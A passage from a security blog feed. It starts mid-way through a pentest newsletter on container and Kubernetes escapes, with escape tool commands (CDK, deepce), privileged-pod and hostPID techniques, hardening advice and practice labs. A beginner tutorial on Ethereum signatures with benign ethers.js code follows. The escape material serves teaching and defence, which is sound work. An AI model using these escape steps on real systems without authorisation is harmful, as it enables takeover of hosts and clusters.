  $APISERVER/api/v1/namespaces/default/pods
```

If the service account has cluster-admin or elevated permissions, you can create a privileged pod with host mounts and escape.

### Kubernetes Node Access

Some Kubernetes pods run with `hostNetwork: true`, `hostPID: true`, or `hostIPC: true`. These settings give you access to the node&apos;s network, process tree, or IPC namespace.

If `hostPID` is enabled, you can see all processes on the node:

```bash
ps aux
```

Look for processes running on the host. If you see SSH, Docker, or kubelet, you might be able to interact with them.

If `hostNetwork` is enabled, you can access internal services that are normally firewalled from pods.

## Tools for Container Escapes

**[CDK (Container Detection Kit)](https://github.com/cdk-team/CDK)** – All-in-one tool for container enumeration and escape. Supports Docker, Kubernetes, and various misconfigurations.

```bash
./cdk evaluate
./cdk run cap-dac-read-search
./cdk run mount-disk
```

**[deepce](https://github.com/stealthcopter/deepce)** – Docker enumeration and escape tool. Checks for common misconfigurations automatically.

```bash
./deepce.sh
```

**[amicontained](https://github.com/genuinetools/amicontained)** – Detects container runtime and checks capabilities.

```bash
amicontained
```

**[botb (Break Out The Box)](https://github.com/brompwnie/botb)** – Container escape analysis and exploitation tool.

**[kubectl](https://kubernetes.io/docs/reference/kubectl/)** – If you&apos;re in a Kubernetes pod with sufficient permissions, `kubectl` is your best friend for interacting with the cluster.

## Defense and Detection

If you&apos;re defending containerized infrastructure, here&apos;s what actually works:

**Don&apos;t Run Privileged Containers** – Ever. There&apos;s almost never a good reason. If you think you need it, you probably don&apos;t.

**Drop Unnecessary Capabilities** – Use `--cap-drop=ALL` and only add what&apos;s required:

```bash
docker run --cap-drop=ALL --cap-add=NET_BIND_SERVICE myapp
```

**Don&apos;t Mount the Docker Socket** – Seriously. If a container needs to manage Docker, use a dedicated orchestration tool like Kubernetes or a secure API proxy.

**Use User Namespaces** – Map container root to an unprivileged user on the host:

```bash
dockerd --userns-remap=default
```

**Read-Only Filesystems** – Mount container filesystems as read-only where possible:

```bash
docker run --read-only myapp
```

**Seccomp and AppArmor Profiles** – Restrict system calls and actions the container can perform. Docker has default profiles; customize them for your app.

**Runtime Security Monitoring** – Tools like **Falco** and **Sysdig** detect abnormal container behavior (process execution, file access, network connections).

**Regular Kernel Updates** – Since containers share the host kernel, keep it patched. Subscribe to kernel security mailing lists.

**Least Privilege for Kubernetes Service Accounts** – Don&apos;t give pods unnecessary RBAC permissions. Default service accounts should have minimal access.

**Network Policies** – In Kubernetes, use network policies to restrict pod-to-pod and pod-to-internet traffic.

## Where to Practice

**TryHackMe – Containers &amp; Kubernetes Rooms:**
- [The Docker Rodeo](https://tryhackme.com/room/dockerrodeo) – Container escape challenges
- [Kubernetes for Everyone](https://tryhackme.com/room/kubernetesforyouly) – Kubernetes security basics

**Hack The Box Machines:**
- **Carpediem** – Container escape via CVE-2022-0492 (cgroup release_agent vulnerability)
- **Opensource** – Container enumeration and Git hooks exploitation
- **MonitorsTwo** – Docker container escape and privilege escalation
- **Ready** – GitLab exploitation and Docker container breakout

**HackTricks – Docker Security:**
[https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/](https://book.hacktricks.wiki/en/network-services-pentesting/2375-pentesting-docker.html#securing-your-docker)

Comprehensive guide covering Docker escapes, misconfigurations, and privilege escalation techniques including privileged containers, Docker socket abuse, and sensitive mounts.

**Your Own Lab:**
Spin up a local Docker environment and practice:
1. Create a privileged container and mount the host filesystem
2. Run a container with excessive capabilities and exploit them
3. Mount `/var/run/docker.sock` and spawn a new privileged container
4. Simulate kernel exploits (in a VM, not on your main system)

## Wrapping Up

Containers are not a security boundary. They&apos;re a convenience layer for packaging and deploying applications. The isolation they provide is useful for preventing accidents, not attacks.

When you land inside a container during a pentest, don&apos;t stop there. Enumerate your environment. Check for privileged mode, excessive capabilities, mounted Docker socket, or writable host paths. Look for Kubernetes service account tokens. Check the kernel version.

One misconfiguration and you&apos;re out. And once you&apos;re out, the entire host and potentially the entire cluster is yours.

## Building Valeris and the Docker Security Series

This whole newsletter came out of a summer spent deep in Docker internals. I wanted to build a practical tool ([Valeris](https://github.com/rsgbengi/valeris)) that could catch these misconfigurations before they turn into incidents.

The tool is still in development, but it&apos;s already functional. It scans running containers for common issues like root users, dangerous mounts, and exposed capabilities. All using YAML-based rules that you can customize without recompiling.

If you want to follow along with the development or dive deeper into container security:

- **[Docker Security Series](https://www.kayssel.com/series/docker-security/)** – Full technical breakdown with hands-on examples
- **[Valeris on GitHub](https://github.com/rsgbengi/valeris)** – The tool itself, contributions welcome
- **[Chapter 1: How Docker Works](https://www.kayssel.com/post/docker-security-1/)** – Namespaces, cgroups, OverlayFS explained
- **[Chapter 2: Privilege Escalation](https://www.kayssel.com/post/docker-security-2/)** – Root containers, SUID attacks, `/proc/&lt;PID&gt;/root` exploitation

Building this tool has been one of the best learning experiences I&apos;ve had this year. It forced me to understand not just how to exploit containers, but how to detect those exploits programmatically. And honestly, that&apos;s where the real learning happens.

So next time you pop a shell and see `/.dockerenv`, don&apos;t groan. Smile. Because you&apos;re about to learn something new about how the infrastructure is configured, and there&apos;s a good chance you&apos;re going to find a way out.

Thanks for reading, and happy escaping.

Ruben</content:encoded><category>Newsletter</category><category>cloud-security</category><author>Ruben Santos</author></item><item><title>Understanding Ethereum Signatures - The Foundation of Web3 Security</title><link>https://www.kayssel.com/post/web3-19</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-19</guid><description>Deep dive into Ethereum&apos;s cryptographic signature system, ECDSA, secp256k1, signature anatomy (r, s, v), and practical examples of signing, verifying, and securing Web3 authentication flows.</description><pubDate>Wed, 05 Nov 2025 09:00:00 GMT</pubDate><content:encoded>## A Personal Note

I&apos;ve been diving deep into Web3 security lately, and one thing keeps coming up in every exploit, every vulnerability, every attack vector. Signatures. They&apos;re the foundation of everything in this space, yet most developers (myself included, until recently) don&apos;t truly understand how they work under the hood.

So I decided to write a series of articles exploring signatures from every angle. How they work, how they break, and how to defend against attacks. This is the first of six posts where we&apos;ll go from fundamentals to advanced exploitation techniques.

If you&apos;ve ever wondered why a simple &quot;sign to login&quot; can drain your wallet, or how attackers bypass security measures, you&apos;re in the right place. Let&apos;s start at the beginning.

## Introduction

Picture this. You walk into a bank, no ID required. No password. No security questions about your first pet&apos;s name. Instead, you pull out a small mathematical proof, something only you could have created, and the bank instantly knows you&apos;re you. No questions asked. No database to hack. No server to breach.

Sound like science fiction? Welcome to Web3.

Here&apos;s the thing about traditional web security. It&apos;s all about *who you know*. Servers, databases, session tokens, they all conspire to remember you. But what happens when that server gets hacked? Ask the 3 billion Yahoo accounts that were compromised. Ask LinkedIn&apos;s 165 million users. The list goes on.

Web3 doesn&apos;t play that game. In this world, **you are your signature**. Not your email. Not your username. Your cryptographic signature is the single source of truth about your identity. There&apos;s no Google or Facebook acting as a middleman. No central authority deciding if you&apos;re really you.

But here&apos;s where it gets interesting and dangerous.

Every transaction you send, every NFT you mint, every smart contract you interact with gets signed with your private key. And if someone gets that key? Game over. No password reset email. No customer support hotline. Your funds are gone, and there&apos;s no undo button.

Think about that for a second. In traditional finance, you can call your bank, freeze your card, dispute a charge. In Web3, your private key is your bank, your vault, and your identity rolled into one. Lose it or expose it, and you&apos;re done.

**So why should you care about signatures?**

Because understanding how these signatures work isn&apos;t just about building dApps or passing a security audit. It&apos;s about understanding the single point of failure that makes or breaks Web3 security. It&apos;s about knowing:

- Why a simple &quot;Sign this message to login&quot; can drain your wallet
- How attackers trick you into signing away your assets
- What actually happens when MetaMask asks you to approve a transaction
- The difference between a signature that proves ownership and one that authorizes theft

Let me be blunt. Every Web3 exploit you&apos;ve read about (the $600M Poly Network hack, the countless phishing attacks, the endless rug pulls) all come down to one thing. **Someone signed something they shouldn&apos;t have**.

Ready to understand the foundation of Web3 security? Let&apos;s dive in.

## Cryptographic Foundations (The Math That Protects Your Money)

### ECDSA and secp256k1 (Your Digital DNA)

You know how you can scramble an egg but can&apos;t unscramble it? That&apos;s the basic idea behind Ethereum&apos;s signature system.

Ethereum uses something called [**ECDSA**](https://en.wikipedia.org/wiki/Elliptic_Curve_Digital_Signature_Algorithm) (Elliptic Curve Digital Signature Algorithm) with the [**secp256k1**](https://en.bitcoin.it/wiki/Secp256k1) curve. Bitcoin uses the exact same system. If that sounds intimidating, don&apos;t worry. The concept is beautifully simple.

Think of it like this. Imagine a magical machine with one door in and one door out. You put a number in the entrance, the machine does some complex math, and out comes a completely different number. Easy, right?

Here&apos;s the magic part. **You cannot go backwards**. Ever. No matter how powerful your computer, no matter how much time you have, you cannot reverse the process. It&apos;s mathematically impossible.

**The journey from private key to your address looks like this**

```
Private Key (256-bit random number)
    ↓ (Elliptic Curve multiplication - one-way function)
Public Key (x,y coordinates on the curve)
    ↓ (Keccak-256 hash + take last 20 bytes)
Ethereum Address (0x...)
```

Let me break this down in human terms.

**Your Private Key** is a 256-bit random number. Think of it as a 32-byte secret, essentially a really, *really* long password. But unlike passwords you create, this one is truly random. So random that the odds of someone generating the same one are smaller than finding a specific grain of sand on all the beaches on Earth. Never share this. Never transmit it. This is your key to everything.

**Your Public Key** gets derived from your private key using elliptic curve mathematics. It&apos;s 64 bytes long. Here&apos;s the beautiful part. Anyone can see your public key, but they can never work backwards to find your private key. The math simply doesn&apos;t allow it.

**Your Ethereum Address** comes from taking that public key, running it through a [Keccak-256](https://en.wikipedia.org/wiki/SHA-3) hash function (we&apos;ll get to that), grabbing the last 20 bytes, slapping a `0x` in front, and boom. That&apos;s your wallet address. The one you share with everyone. The one on your Twitter profile.

The security here relies on something called the **Elliptic Curve Discrete Logarithm Problem** ([ECDLP](https://en.wikipedia.org/wiki/Discrete_logarithm)). Fancy name for a simple concept. Given a public key, it&apos;s computationally impossible to figure out the private key that created it.

How impossible? Let&apos;s put it this way. If you started trying to crack a single private key today, using all the computing power currently on Earth, the universe would end before you succeeded. That&apos;s not an exaggeration. That&apos;s math.

### Keccak-256 (The Blender That Can&apos;t Be Un-Blended)

Now let&apos;s talk about the hash function Ethereum uses. **Keccak-256**.

Think of a hash function like a super-powered blender. You throw in ingredients (your data), hit the button, and out comes a smoothie (the hash). But here&apos;s the thing. you can never separate that smoothie back into its original ingredients. Strawberries, bananas, spinach, once blended, they&apos;re gone forever. All you have is the smoothie.

That&apos;s what Keccak-256 does to your data. It takes any input, could be a message, could be your public key, could be an entire transaction, and spits out a unique 256-bit (32-byte) fingerprint.

Here&apos;s what makes it special:
- **Same input always produces the same output**. Blend the same ingredients, get the same smoothie
- **Different inputs produce wildly different outputs**. Change one letter in your message, and the hash is completely unrecognizable
- **One-way only**. You can&apos;t reverse it. Ever.

```javascript
// Example. Generating an Ethereum address from a public key
const { keccak256 } = require(&apos;ethers&apos;);

// Public key (64 bytes, uncompressed, without 0x04 prefix)
const publicKey = &quot;0x1234...&quot;; // Your full public key here

// Hash and take last 20 bytes
const address = &quot;0x&quot; + keccak256(publicKey).slice(-40);
```

**Quick reality check. Why does Ethereum use Keccak-256 and not SHA-256 like Bitcoin?**

Because when Ethereum was being designed in 2014, [Keccak had just won the SHA-3 competition](https://www.nist.gov/news-events/news/2012/10/nist-selects-winner-secure-hash-algorithm-sha-3-competition) but hadn&apos;t been standardized yet. Ethereum adopted the original Keccak algorithm, while the final [SHA-3 standard](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.202.pdf) made some tweaks. So technically, Ethereum uses Keccak-256, not SHA3-256. They&apos;re cousins, not twins.

Why does this matter for you as a security researcher? Because if you&apos;re verifying signatures or reproducing exploits, using the wrong hash function will break everything. Always use Keccak-256 for Ethereum work.

![](/content/images/2025/10/ethr_addr_creation.png)

*Diagram. The derivation flow from Private Key to Ethereum Address - note the one-way nature of each step*

## Ethereum Signature Anatomy. Breaking Down Your Digital Signature

Picture a signature on a check. One smooth motion of your pen, right? Simple.

Now imagine if that signature could do more than just prove you wrote it. What if, just by looking at it, someone could verify it came from you, figure out who you are, and confirm you actually meant to sign that specific check, all without ever asking you a single question?

That&apos;s what an Ethereum signature does. And it&apos;s made up of three pieces. **r**, **s**, and **v**.

### The Three Components. r, s, v, Your Signature&apos;s DNA

```javascript
// A typical Ethereum signature
const signature = {
  r: &quot;0x1234567890abcdef...&quot;, // 32 bytes
  s: &quot;0xfedcba0987654321...&quot;, // 32 bytes
  v: 27 // or 28 (1 byte - recovery identifier)
};

// Often serialized as a single 65-byte hex string:
// &quot;0x&quot; + r (64 chars) + s (64 chars) + v (2 chars)
const compactSig = &quot;0x1234...27&quot;;
```

Let&apos;s demystify these three letters:

**r - The Random Point**. This is the x-coordinate of a random point on the elliptic curve. Think of it as the first half of your cryptographic proof. It&apos;s 32 bytes of pure mathematical certainty.

**s - The Signature Proof**. This is where your private key comes into play. The &apos;s&apos; value is derived from both the message hash AND your private key. It&apos;s the part that says &quot;Yes, the owner of this private key really did sign this message.&quot; Another 32 bytes.

**v - The Recovery ID**. Here&apos;s the clever bit. Remember how your public key can&apos;t be derived from your address? Well, the &apos;v&apos; value (either 27 or 28) is a tiny breadcrumb that lets anyone recover your public key from your signature. Just 1 byte, but it&apos;s mighty important.

Together, these three components take up 65 bytes. That&apos;s it. 65 bytes of mathematical proof that you, and only you, signed something.

### Transaction Signatures vs Message Signatures. Two Flavors, Different Purposes

Here&apos;s where things get interesting. Ethereum has two types of signatures, and confusing them is like mixing up a deposit slip with a blank check. Both involve your signature, but the consequences are very different.

#### 1. Transaction Signatures. The Autopilot

Ever notice how when you send ETH or interact with a smart contract, MetaMask just... handles it? You click &quot;Confirm,&quot; and your wallet automatically signs the transaction.

That&apos;s a transaction signature. It&apos;s automatic, built into the process:

```javascript
// When you send a transaction, it&apos;s automatically signed
const tx = await signer.sendTransaction({
  to: &quot;0x742d35Cc6634C0532925a3b844Bc9e7595f0bEb&quot;,
  value: ethers.parseEther(&quot;1.0&quot;)
});

// The transaction object contains r, s, v internally
// You don&apos;t manually create the signature
```

**What&apos;s actually being signed here?**

Your wallet takes all the transaction details (nonce, gas price, gas limit, recipient address, value, data, and chain ID) and packages them using **RLP encoding** (Recursive Length Prefix). RLP is Ethereum&apos;s way to serialize data into a compact byte array. This RLP-encoded transaction gets hashed with Keccak-256, and that hash is what actually gets signed with your private key.

This signature goes on-chain. Ethereum nodes verify it automatically. If the signature is valid, the transaction executes. If not, it&apos;s rejected. No human judgment involved.

#### 2. Message Signatures. The Manual Handshake

Now, what if you just want to prove you own an address without spending any gas? What if a website wants you to log in with your wallet? What if you&apos;re voting in a DAO?

Enter message signatures. These are explicit, manual, and **dangerous if you don&apos;t understand them**.

```javascript
// You explicitly sign a message
const message = &quot;I authorize this action&quot;;
const signature = await signer.signMessage(message);

// What actually gets signed includes a prefix:
// &quot;\x19Ethereum Signed Message:\n&quot; + len(message) + message
```

Unlike transactions, message signatures:
- Don&apos;t cost gas
- Don&apos;t change the blockchain
- Are used for off-chain verification (authentication, proofs of ownership, etc.)
- Can be verified by anyone, anywhere, smart contracts, websites, backend servers

But here&apos;s the critical part. **message signatures are manually verified**. A smart contract or backend has to explicitly check them. And if the checking code is buggy or malicious? You&apos;re signing away your security.

### The ETH Prefix. The Security Feature That Saves Your Assets

Now let me tell you about one of the most elegant security features in Ethereum, one that most people don&apos;t even know exists.

When you sign a message, Ethereum doesn&apos;t actually sign your message directly. Instead, it adds a special prefix as defined in [EIP-191](https://eips.ethereum.org/EIPS/eip-191):

```
\x19Ethereum Signed Message:\n&lt;length&gt;&lt;message&gt;
```

**Why does this matter? Because it prevents a clever attack.**

Imagine this scenario. A website asks you to sign a message that says &quot;I am the owner of this wallet.&quot; Seems harmless, right? You&apos;re just proving ownership, no money is moving.

But what if an attacker could take that same signature and use it as a transaction signature? What if they crafted a transaction that, when hashed, produced the exact same hash as your &quot;harmless&quot; message?

Without the prefix, they could. Your message signature could become a transaction signature. Your innocent proof of ownership could become authorization to drain your wallet.

**The prefix makes this impossible.**

By adding `\x19Ethereum Signed Message:\n` before your message, Ethereum ensures that:
1. A message signature can never look like a transaction signature
2. A transaction signature can never look like a message signature
3. You can never accidentally sign a transaction when you think you&apos;re just signing a message

**Here&apos;s what actually gets signed when you sign &quot;Hello World&quot;:**

```javascript
const message = &quot;Hello World&quot;;
// Actual signed data:
// &quot;\x19Ethereum Signed Message:\n11Hello World&quot;
//                                 ^^
//                         length = 11 bytes
```

That `\x19` is a special byte that tells Ethereum &quot;this is a message signature, not a transaction.&quot; The rest is human-readable. &quot;Ethereum Signed Message&quot; followed by the length (11 characters) and then your message.

Simple. Elegant. And it&apos;s saved countless wallets from being drained.

But here&apos;s the thing. not all signature schemes have this protection. As we&apos;ll see in later posts, there are ways to trick users into signing things they shouldn&apos;t. The prefix helps, but it&apos;s not a silver bullet.

![](/content/images/2025/11/signature-flows.svg)

*Key difference between Transaction and Message signature flows - note the ETH prefix in message signatures*

## Hands-on Demo. Time to Get Your Hands Dirty

Alright, enough theory. Let&apos;s actually do this.

I&apos;m going to walk you through four practical examples that will cement your understanding of how Ethereum signatures work. By the end, you&apos;ll have working code that signs messages, verifies them, and even builds a complete authentication system.

Grab a coffee. Fire up your terminal. Let&apos;s build.

### Setup. Getting Your Tools Ready

First, you&apos;ll need ethers.js, the Swiss Army knife of Ethereum development:

```bash
npm install ethers
```

That&apos;s it. Now we&apos;re ready to sign some messages.

### Example 1. Creating Your First Signature

Let&apos;s start simple. We&apos;re going to create a wallet, sign a message, and see what a signature actually looks like under the hood.

```javascript
const { ethers } = require(&apos;ethers&apos;);

async function signMessage() {
  // Create a random wallet (or use existing private key)
  const wallet = ethers.Wallet.createRandom();

  console.log(&quot;Address:&quot;, wallet.address);
  console.log(&quot;Private Key:&quot;, wallet.privateKey);

  // The message we want to sign
  const message = &quot;I am the owner of this address&quot;;

  // Sign the message
  const signature = await wallet.signMessage(message);

  console.log(&quot;\nMessage:&quot;, message);
  console.log(&quot;Signature:&quot;, signature);

  // Break down the signature into r, s, v
  const sig = ethers.Signature.from(signature);
  console.log(&quot;\nSignature components:&quot;);
  console.log(&quot;r:&quot;, sig.r);
  console.log(&quot;s:&quot;, sig.s);
  console.log(&quot;v:&quot;, sig.v);

  return { wallet, message, signature };
}

signMessage();
```

**Run this code and you&apos;ll see something like:**

![](/content/images/2025/10/first-signature.png)

*Showing all the data of a signature* 

Look at that. That long hexadecimal string is your signature, 65 bytes of cryptographic proof. The `r`, `s`, and `v` components we talked about earlier? There they are, broken down for you.

**Here&apos;s what just happened:**
1. We created a random wallet (never do this in production, obviously, use a secure key management system)
2. We signed a simple message
3. We broke the signature down into its components

This signature now proves that the owner of that address signed that exact message. Change a single character in the message, and the signature becomes invalid.

### Example 2. The Magic of Signature Verification

Now let&apos;s verify a signature. This is where the magic happens, where we can prove, without a doubt, that someone who controls a specific address signed a specific message.

```javascript
const { ethers } = require(&apos;ethers&apos;);

async function verifySignature() {
  // Original signer
  const wallet = ethers.Wallet.createRandom();
  const message = &quot;Authenticate me&quot;;
  const signature = await wallet.signMessage(message);

  console.log(&quot;Original signer:&quot;, wallet.address);

  // Verify signature by recovering the address
  const recoveredAddress = ethers.verifyMessage(message, signature);

  console.log(&quot;Recovered address:&quot;, recoveredAddress);
  console.log(&quot;Signature valid:&quot;, recoveredAddress === wallet.address);

  // Try with wrong message (should fail)
  const wrongMessage = &quot;Different message&quot;;
  const recoveredWrong = ethers.verifyMessage(wrongMessage, signature);

  console.log(&quot;\nWith wrong message:&quot;, recoveredWrong);
  console.log(&quot;Signature valid:&quot;, recoveredWrong === wallet.address);
}

verifySignature();
```

**The output tells the story:**

![](/content/images/2025/10/second_signature.png)

*Try to verify the signature using other message*

With the correct message, we recovered the exact address that signed it. Perfect match. Valid signature.

But when we tried to verify the same signature with a different message, we got a completely different address back, and the verification failed.

This is the beauty of cryptographic signatures. The signature is bound to both the message AND the private key. Change either one, and the math breaks. There&apos;s no way to forge it, no way to modify the message after signing. The signature is proof of exactly what was signed, by exactly whom.

This is why phishing attacks in Web3 are so devastating. If an attacker tricks you into signing a malicious message, that signature is cryptographically valid. There&apos;s no disputing it. The blockchain doesn&apos;t care about your intentions, only about the math.


### Example 3. Peeking Under the Hood, The Prefix in Action

Remember that ETH prefix I told you about? Let&apos;s actually see it in action. This example shows you what Ethereum is really signing when you think you&apos;re just signing &quot;Hello&quot;.

Let&apos;s see what actually gets hashed when signing:

```javascript
const { ethers } = require(&apos;ethers&apos;);

function demonstratePrefix() {
  const message = &quot;Hello&quot;;

  // What ethers.js does internally:
  // 1. Create the prefixed message
  const prefix = &quot;\x19Ethereum Signed Message:\n&quot;;
  const messageBytes = ethers.toUtf8Bytes(message);
  const prefixedMessage = ethers.concat([
    ethers.toUtf8Bytes(prefix),
    ethers.toUtf8Bytes(String(messageBytes.length)),
    messageBytes
  ]);

  console.log(&quot;Original message:&quot;, message);
  console.log(&quot;Message bytes:&quot;, ethers.hexlify(messageBytes));
  console.log(&quot;Prefixed message:&quot;, ethers.hexlify(prefixedMessage));

  // 2. Hash the prefixed message
  const messageHash = ethers.keccak256(prefixedMessage);
  console.log(&quot;\nFinal hash to sign:&quot;, messageHash);

  // Compare with ethers.js helper
  const expectedHash = ethers.hashMessage(message);
  console.log(&quot;ethers.hashMessage:&quot;, expectedHash);
  console.log(&quot;Match:&quot;, messageHash === expectedHash);
}

demonstratePrefix();
```

**The output reveals the truth:**


![](/content/images/2025/10/prefix_signature.png)

*Verifying that the prefix is also signed*

1. Your original message. `&quot;Hello&quot;` → In hex. `0x48656c6c6f`
2. But Ethereum doesn&apos;t sign that. It adds. `\x19Ethereum Signed Message:\n5` (where 5 is the length)
3. The full prefixed message in hex. `0x19457468657265756d205369676e6564204d6573736167653a0a3548656c6c6f`
4. That gets hashed with Keccak-256, producing your final hash

This is what actually gets signed. Not &quot;Hello&quot;, the whole prefixed string.

Why does this matter? Because if you&apos;re ever building a system that verifies Ethereum signatures, you need to reconstruct this exact prefix. Miss it, and your signature verification will fail every time.

### Example 4. Building a Real Authentication System

Now let&apos;s put it all together. This is how sites like OpenSea and Uniswap let you &quot;sign in with Ethereum&quot; without passwords, databases, or any traditional auth infrastructure.

Here&apos;s a practical example of how signatures are used for authentication:

```javascript
const { ethers } = require(&apos;ethers&apos;);

// Simulated backend verification
class AuthenticationService {
  // Step 1. Generate a challenge (nonce)
  generateChallenge(address) {
    const nonce = Math.floor(Math.random() * 1000000);
    const timestamp = Date.now();
    const challenge = `Sign this message to authenticate:
Nonce: ${nonce}
Timestamp: ${timestamp}
Address: ${address}

This request will not trigger a blockchain transaction or cost any gas fees.`;

    // Store challenge for this address (in real app, use database)
    this.challenges = this.challenges || {};
    this.challenges[address] = { challenge, timestamp };

    return challenge;
  }

  // Step 2. Verify the signature
  async verifySignature(address, signature, challenge) {
    // Check if challenge exists and is recent (5 min timeout)
    const stored = this.challenges[address];
    if (!stored) {
      throw new Error(&quot;No challenge found for this address&quot;);
    }

    if (Date.now() - stored.timestamp &gt; 300000) {
      throw new Error(&quot;Challenge expired&quot;);
    }

    if (stored.challenge !== challenge) {
      throw new Error(&quot;Challenge mismatch&quot;);
    }

    // Recover address from signature
    const recoveredAddress = ethers.verifyMessage(challenge, signature);

    // Verify it matches
    if (recoveredAddress.toLowerCase() !== address.toLowerCase()) {
      throw new Error(&quot;Signature verification failed&quot;);
    }

    // Clean up used challenge
    delete this.challenges[address];

    return true;
  }
}

// Simulated frontend
async function authenticateUser() {
  const wallet = ethers.Wallet.createRandom();
  const authService = new AuthenticationService();

  console.log(&quot;=== Web3 Authentication Demo ===\n&quot;);
  console.log(&quot;User address:&quot;, wallet.address);

  // Step 1. Request challenge from backend
  const challenge = authService.generateChallenge(wallet.address);
  console.log(&quot;\nChallenge from server:&quot;);
  console.log(challenge);

  // Step 2. User signs the challenge
  const signature = await wallet.signMessage(challenge);
  console.log(&quot;\nUser signature:&quot;);
  console.log(signature);

  // Step 3. Send signature to backend for verification
  try {
    const verified = await authService.verifySignature(
      wallet.address,
      signature,
      challenge
    );
    console.log(&quot;\n✓ Authentication successful!&quot;);
    console.log(&quot;User is now logged in&quot;);
  } catch (error) {
    console.log(&quot;\n✗ Authentication failed:&quot;, error.message);
  }
}

authenticateUser();
```

**The beautiful, password-free dance:**

![](/content/images/2025/10/auth.png)

*Basic authentication example*

1. **Server generates a unique challenge**. It includes a random nonce and timestamp. This prevents replay attacks, someone can&apos;t reuse an old signature to log in later.

2. **User signs the challenge**. Your wallet pops up, shows you the message, you click &quot;Sign.&quot; No password entered. No session cookie created. Just a signature.

3. **Server verifies the signature**. It uses `ethers.verifyMessage()` to recover the address from the signature. If it matches the address you claimed to be, you&apos;re in. If not, rejected.

No database of passwords to breach. No session tokens to steal. No password reset flow to exploit. Just pure cryptographic proof of identity.

This is the pattern used by OpenSea, Uniswap, ENS, and countless other dApps. It&apos;s elegant, it&apos;s secure, and it&apos;s fundamentally different from traditional auth.

**But here&apos;s the catch:** This entire system relies on users actually reading what they&apos;re signing. If an attacker can trick you into signing a malicious message (maybe one that grants them token approvals), your authentication system becomes an attack vector.

We&apos;ll dive deep into these attacks in future posts. For now, just remember. **the signature is only as secure as what you&apos;re signing**.

## Key Takeaways. What You Need to Remember

If you forget everything else from this post, remember these five things:

### 1. Your Signature IS Your Identity

There&apos;s no password reset button in Web3. No customer support to call. Your private key is your identity, and your signature is proof you control it.

Think of it this way. In traditional apps, you prove who you are by knowing a secret (your password). In Web3, you prove who you are by being able to create a signature that only the owner of the private key could create. The difference? One can be guessed or stolen from a server. The other is mathematically impossible to forge.

- Your private key never leaves your wallet
- Your signature proves you control an address
- No central authority verifies you, only mathematics
- Lose your key, lose everything. No exceptions.

### 2. Two Types of Signatures, Two Different Worlds

| Aspect | Transaction Signatures | Message Signatures |
|--------|----------------------|-------------------|
| **Creation** | Automatic (wallet handles it) | Manual (you explicitly sign) |
| **Purpose** | Change blockchain state | Prove ownership/authenticate |
| **Encoding** | RLP (complex, includes nonce) | ETH prefix (`\x19Ethereum Signed Message:\n`) |
| **Verification** | Automatic by network nodes | Manual by smart contracts or backends |
| **Cost** | Requires gas fees | Free (off-chain) |
| **Risk** | Clear, moving funds/executing code | Hidden, can be used for approvals |

Transaction signatures are obvious, you&apos;re sending ETH, minting an NFT, doing something on-chain. Message signatures are sneaky, they look innocent but can authorize dangerous things.

### 3. The Prefix Saved Your Wallet (And You Didn&apos;t Even Know It)

The `\x19Ethereum Signed Message:\n` prefix is a silent guardian. It ensures that a harmless &quot;prove you own this wallet&quot; signature can never be reused as a transaction signature.

Without it? An attacker could trick you into signing a message, then use that signature to drain your funds. With it? Those two worlds stay separate.

### 4. r, s, v, The DNA of Every Signature

Every signature has three components:
- **r and s**. The cryptographic proof (64 bytes total)
- **v**. The recovery hint that lets us figure out your public key (1 byte)

All three are needed. Miss one, and the signature is useless.

### 5. This is Just the Foundation

Everything we&apos;ve covered, ECDSA, Keccak-256, signature anatomy, the prefix, this is the bedrock of Web3 security. Every exploit, every attack, every vulnerability in this space ultimately comes down to signatures.

Understanding this foundation means you can:
- Spot phishing attacks before you sign
- Understand why certain smart contract patterns are dangerous
- Build more secure dApps
- Audit code for signature-related vulnerabilities

And here&apos;s the thing. **most Web3 developers don&apos;t understand this deeply enough**. Most users certainly don&apos;t. That&apos;s why signature-based attacks are so common and so devastating.

## Technical References

### Ethereum Standards and Specifications

1. **[EIP-191 - Signed Data Standard](https://eips.ethereum.org/EIPS/eip-191)**
   The official Ethereum Improvement Proposal defining the `\x19Ethereum Signed Message` prefix and signed data format. This is the authoritative source for message signature standards.

2. **[Ethereum Yellow Paper](https://ethereum.github.io/yellowpaper/paper.pdf)**
   Gavin Wood&apos;s formal specification of the Ethereum protocol, including the ECDSA signature scheme and transaction structure.

3. **[Ethers.js Documentation - Signing](https://docs.ethers.org/v6/api/wallet/)**
   Official documentation for the ethers.js library used in all code examples. Covers wallet creation, message signing, and signature verification.

### Cryptographic Standards

4. **[SEC 2 - secp256k1 Curve Parameters](https://www.secg.org/sec2-v2.pdf)**
   Standards for Efficient Cryptography Group specification of the secp256k1 elliptic curve used by both Bitcoin and Ethereum.

5. **[ECDSA - Elliptic Curve Digital Signature Algorithm](https://en.wikipedia.org/wiki/Elliptic_Curve_Digital_Signature_Algorithm)**
   Comprehensive explanation of the ECDSA signature algorithm and the Elliptic Curve Discrete Logarithm Problem (ECDLP).

6. **[NIST FIPS 202 - SHA-3 Standard](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.202.pdf)**
   Official SHA-3 specification. Note that Ethereum uses the original Keccak-256, not the final SHA3-256 standard.

7. **[Keccak Team - Original SHA-3 Submission](https://keccak.team/keccak.html)**
   Documentation from the Keccak team explaining the difference between the original Keccak and the final SHA-3 standard.

### Security Research and Case Studies

8. **[Rekt.news](https://rekt.news/)**
   Documented Web3 exploits and post-mortems. See real-world examples of signature-based attacks.

9. **[Trail of Bits - Smart Contract Security](https://blog.trailofbits.com/)**
   Security research from one of the leading blockchain security firms, including signature vulnerability research.

10. **[ConsenSys - Smart Contract Best Practices](https://consensys.github.io/smart-contract-best-practices/)**
    Security guidelines including signature verification patterns and common pitfalls.

### Additional Resources

11. **[Bitcoin Wiki - secp256k1](https://en.bitcoin.it/wiki/Secp256k1)**
    Detailed explanation of the secp256k1 curve parameters and security properties.

12. **[Ethereum Stack Exchange - Keccak vs SHA-256](https://ethereum.stackexchange.com/questions/550/which-cryptographic-hash-function-does-ethereum-use)**
    Community discussion explaining why Ethereum uses Keccak-256 and the technical differences.


## Final Thoughts

Here&apos;s the truth. signatures are simultaneously the most secure and most vulnerable part of Web3.

Secure because the math is unbreakable. No quantum computer is cracking ECDSA anytime soon. The cryptography is sound.

Vulnerable because humans are the weak link. We click &quot;Sign&quot; without reading. We trust interfaces that lie to us. We assume that &quot;signing to authenticate&quot; is always safe.

It&apos;s not.

